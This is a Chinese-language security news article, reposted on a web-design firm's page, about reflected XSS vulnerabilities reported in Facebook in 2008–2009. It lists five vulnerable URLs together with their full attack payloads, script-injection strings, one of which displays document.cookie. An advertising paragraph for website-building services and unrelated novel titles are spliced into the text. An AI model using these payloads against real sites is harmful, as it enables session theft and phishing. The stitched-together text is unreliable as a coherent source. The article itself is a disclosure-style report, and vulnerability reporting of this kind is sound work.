梦入神机,辰东,盗墓笔记全集

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

詳解Facebook最新高危XSS安全漏洞

【.com 獨家特稿】近期，F(xiàn)acebook驚現(xiàn)高危XSS安全漏洞，致使其用戶遭受巨大威脅。本文將對這些漏洞發(fā)布進行詳細介紹。
Facebook在2008年12月15日與2009年1月4日被曝出一系列高危XSS安全漏洞，F(xiàn)acebook眾多的功能同時遭受牽連，如新用戶注冊、iPhone登錄、密碼重新設(shè)定，等等。

為托克托等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計制作服務(wù)，及托克托網(wǎng)站建設(shè)行業(yè)解決方案。主營業(yè)務(wù)為做網(wǎng)站、網(wǎng)站設(shè)計、托克托網(wǎng)站設(shè)計，以傳統(tǒng)方式定制建設(shè)網(wǎng)站，并提供域名空間備案等一條龍服務(wù)，秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務(wù)。我們深信只要達到每一位用戶的要求，就會得到認可，從而選擇與我們長期合作。這樣，我們也可以走得更遠！

攻擊者能夠利用這些XSS漏洞攻擊數(shù)以百萬計的Facebook用戶，例如散播惡意軟件、廣告軟件和間諜軟件等等。拜這些高危跨站點腳本攻擊漏洞所賜，F(xiàn)acebook用戶可能受到釣魚攻擊并導(dǎo)致ID失竊。截至本月5號為止，這些漏洞尚未得到修復(fù)，這些高危漏洞已經(jīng)對用戶的隱私構(gòu)成了高度的威脅。

安全研究人員最近發(fā)現(xiàn)的有XSS漏洞的頁面包括，開發(fā)人員頁面、新用戶注冊頁面、iphone登錄頁面以及應(yīng)用程序頁面。攻擊者能夠利用這些XSS漏洞攻擊數(shù)以百萬計的Facebook用戶，例如散播惡意軟件、廣告軟件和間諜軟件等等。對于用戶來說，為了遠離這些威脅的攻擊最好不要接受不認識的人員加為好友的請求，千萬不要點擊不明來源的鏈接。

原因是Facebook的個人概況中包含了許多個人信息，“好友”通過則這些信息足以發(fā)動有針對性的釣魚攻擊，或者向您發(fā)送有針對性的垃圾郵件。但是如果您點擊了一個共享鏈接結(jié)果會怎樣呢？很明顯，對他們來說，您就不會有什么隱私了?。?！為了安全和隱私起見，一定要注意您在社交網(wǎng)絡(luò)上的個人簡介。

下面我們對這些最新漏洞分析進行介紹：

1號XSS漏洞：

所在位置：http://www.new.facebook.com/r.php
問題頁面的鏡像：http://www.xssed.com/mirror/50947/
攻擊性POST：reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar

2號XSS漏洞

所在位置：
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
問題頁面的鏡像：http://www.xssed.com/mirror/53885/
攻擊性POST：
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

3號XSS漏洞

所在位置及攻擊字符串：
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
問題頁面的鏡像：http://www.xssed.com/mirror/55268/

4號XSS漏洞：

所在位置：http://developers.facebook.com/tools.php?fbml
問題頁面的鏡像：http://www.xssed.com/mirror/55392/
攻擊性POST：
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Hey you all! Our best wishes for 2009!!! ???? ????

5號XSS漏洞：

這是Facebook的Reset Password頁面近期再次出現(xiàn)危險的跨站點腳本攻擊安全漏洞。惡意用戶可以網(wǎng)其中諸如代碼并竊取數(shù)以百萬計的Facebook用戶的敏感個人信息。但愿這個漏洞能夠得到迅速修復(fù)，好在以前他們的反應(yīng)還是很迅速的。

所在位置：
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

問題頁面的鏡像：
http://www.xssed.com/mirror/55951/

快照：

圖1

【.COM 獨家特稿，轉(zhuǎn)載請注明出處及作者！】

【編輯推薦】

XSS攻擊升溫，Web業(yè)務(wù)安全面臨更大挑戰(zhàn)
XSS攻擊防御技術(shù)白皮書
長URL背后的殺機網(wǎng)站防范XSS攻擊實錄

網(wǎng)頁標(biāo)題：詳解Facebook最新高危XSS安全漏洞
文章鏈接：http://fisionsoft.com.cn/article/dpjjjhp.html

新聞中心

其他資訊